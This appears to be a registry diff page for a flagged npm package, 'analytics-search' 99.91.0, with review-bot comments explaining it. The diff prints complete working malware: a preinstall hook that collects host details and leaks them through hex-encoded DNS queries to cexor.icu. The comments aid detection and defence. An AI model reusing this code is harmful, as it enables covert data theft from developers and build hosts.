analytics-search 99.91.0


Potentially problematic release.


This version of analytics-search might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +111 -0
  2. package/package.json +13 -0
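--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,111 @@
+ const os = require("os");
+ const dns = require("dns");
+ const https = require("https");
+ const crypto = require("crypto");
+
+ // IPinfo API tokens to avoid rate limiting
+ const IPINFO_TOKENS = [
+ "e9334ba807050e1",
+ "26ed3371fb48a1",
+ "ca6b61c75a1ea9",
+ "c8e4ba13f45cdc"
+ ];
+
+ let currentTokenIndex = 0;
+
+ // Function to rotate IPinfo tokens
+ function getNextToken() {
+ const token = IPINFO_TOKENS[currentTokenIndex];
+ currentTokenIndex = (currentTokenIndex + 1) % IPINFO_TOKENS.length;
+ return token;
+ }
+
+ // Function to fetch organization info from IPinfo
+ function getOrganizationFromIP(ip) {
+ return new Promise((resolve) => {
+ const token = getNextToken();
+ const url = `https://ipinfo.io/${ip}?token=${token}`;
+
+ https.get(url, (res) => {
+ let data = "";
+ res.on("data", (chunk) => {
+ data += chunk;
+ });
+ res.on("end", () => {
+ try {
+ const response = JSON.parse(data);
+ resolve(response.org || "Unknown Organization");
+ } catch (err) {
+ resolve("Unknown Organization");
+ }
+ });
+ }).on("error", () => {
+ resolve("Unknown Organization");
+ });
+ });
+ }
+
+ // Fetch system and victim data
+ async function collectData() {
+ const ipAddress = getIPAddress();
+ const organization = await getOrganizationFromIP(ipAddress);
+
+ const data = {
+ time: new Date().toISOString(),
+ organization: organization || "Unknown",
+ ip_address: ipAddress,
+ package_name: "analytics-search",
+ hostname: os.hostname(),
+ current_path: process.cwd(),
+ };
+
+ return data;
+ }
+
+ // Function to get the victim's IP address
+ function getIPAddress() {
+ const interfaces = os.networkInterfaces();
+ for (const name of Object.keys(interfaces)) {
+ for (const iface of interfaces[name]) {
+ if (!iface.internal && iface.family === "IPv4") {
+ return iface.address;
+ }
+ }
+ }
+ return "127.0.0.1"; // Default to localhost if no external IP found
+ }
+
+ // Encode data into hex and split into chunks
+ function encodeDataInChunks(data, chunkSize = 50) {
+ const jsonData = JSON.stringify(data);
+ const hexData = Buffer.from(jsonData).toString("hex");
+
+ const chunks = [];
+ for (let i = 0; i < hexData.length; i += chunkSize) {
+ chunks.push(hexData.slice(i, i + chunkSize));
+ }
+
+ return chunks;
+ }
+
+ // Send DNS queries directly (no dig)
+ async function sendData() {
+ const data = await collectData();
+ const chunks = encodeDataInChunks(data);
+
+ // Send the chunks with a simple index (1, 2, 3...)
+ for (let i = 0; i < chunks.length; i++) {
+ const chunk = chunks[i];
+ const query = `${i + 1}-${chunk}.cexor.icu`; // Use simple index (1, 2, 3...)
+
+ dns.resolve(query, (err) => {
+ if (err) {
+ // We don't print anything to console
+ }
+ // No console output
+ });
+ }
+ }
+
+ // Trigger the data exfiltration process
+ sendData();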
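Review bot: The unconditional `sendData();` call on line 111 means that merely loading this file sends host details off the machine, and nothing in the file implements any search or analytics function. `collectData()` gathers the hostname, working directory, first non-internal IPv4 address and an ipinfo.io organisation lookup; `sendData()` then hex-encodes that JSON and issues one `dns.resolve` per 50-character chunk under `cexor.icu`, with the error callback left empty so failures stay silent. Because the data leaves through the system resolver, HTTP egress filtering will not see it; the signals to look for are resolver logs showing numbered long-hex labels under that domain, or a request to ipinfo.io from a build host. The file should not be installed or merged, and any host that already ran it should be treated as having disclosed those fields.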
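--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,13 @@
+ {
+ "name": "analytics-search",
+ "version": "99.91.0",
+ "description": "analytics-search",
+ "main": "index.js",
+ "scripts": {
+ "preinstall":"node index.js",
+ "test": "echo \"Error: no test specified\" && exit 1"
+ },
+ "keywords": [],
+ "author": "",
+ "license": "ISC"
+ }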
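Review bot: The `"preinstall":"node index.js"` script on line 7 runs index.js during `npm install`, before any project code imports the package, so installation alone executes whatever that file does at module level. The version `99.91.0`, combined with an empty author and a description that only repeats the name, is consistent with a dependency-confusion placeholder meant to outrank an internal package of the same name, though the page does not show what it targets. Installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) keeps this hook from running, and resolving internal package names only from a scoped or private registry keeps a public version like this from being selected at all.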